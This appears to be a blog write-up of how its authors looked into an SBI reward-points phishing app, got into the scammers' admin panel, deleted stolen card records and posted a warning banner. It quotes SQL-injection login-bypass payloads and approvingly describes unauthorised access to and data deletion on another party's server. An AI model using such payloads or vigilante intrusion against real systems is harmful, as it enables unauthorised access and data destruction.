Destroying the Scammers Portal — SBI Scam
Greetings to all readers,
Introduction to the Story
Last night one of my friend Animesh messaged me about another scam message he received in the name of SBI Reward Points.
So, we decided to look into this scam.
Upon checking the link I found that the website asks victims to download and install an app to receive 5000 reward points on their card.
Exploitation
I installed the application on my test emulator and bypassed the SSL pinning.
Upon launching it asks the user for their credit card details along with personal details to receive the rewards points on their credit card.
On submitting the form it sends all the details to the attacker server.
Also, the application requests SMS permission in order to run.
If we see the decompiled code one can find the messages in the phone are being sent to /api/message.php and form data are being sent to /api/signup.php
Upon checking the URLs, I found it is vulnerable to SQL Injection but on insert query and no error is being shown.
As Mysql version>5.7 and it was using PHP for back-end with no stack query support.This makes it hard to exploit on this API.
But after checking a few things on the domain I found an admin panel hosted on the same domain at /admin .
Surprisingly, the admin Panel was vulnerable to SQL Injection on its login page. Basic payloads like
‘ or 1=1 — -
‘ or ‘’=’
worked and I got access to the admin panel.
Now, I can see all the users being phished and all the messages that are being logged in the portal.
Now on admin panel, there were many of SQLI-vulnerable URLs so one can fetch anything from the database.
Well, the current user has no root priv so I cannot drop the database or delete any records.
The logged data includes Name, email, card no, CVV, DOB, and expiry. When scammers use the phished card he also gets the messages being sent for the OTP.
So without any further user interaction, an attacker can read the OTP from the portal and proceed with the transaction easily.
Fortunately, there was an option in the admin panel to delete a record that has been logged.
For deleting all the records, I made a small python script with an admin cookie in request to delete all the records on the portal.
Also in order to prevent other users from being phished through the app I abused the App Setting feature in the admin panel and set a warning message as a Fake APP alert.
So anyone now opening the app or page will see my message as below.
There were thousands of saved card on the portal which was deleted using the above-mentioned script.
Conclusion
Not to install any suspicious app or untrusted app.
Not to provide your information like personal details/card details to any app.
Not to provide suspicious permissions to any app like here SMS read permission was being abused for fetching OTPs.
Credits
Animesh Roy (anir0y)
Shashwat Kumar(@rahullraz)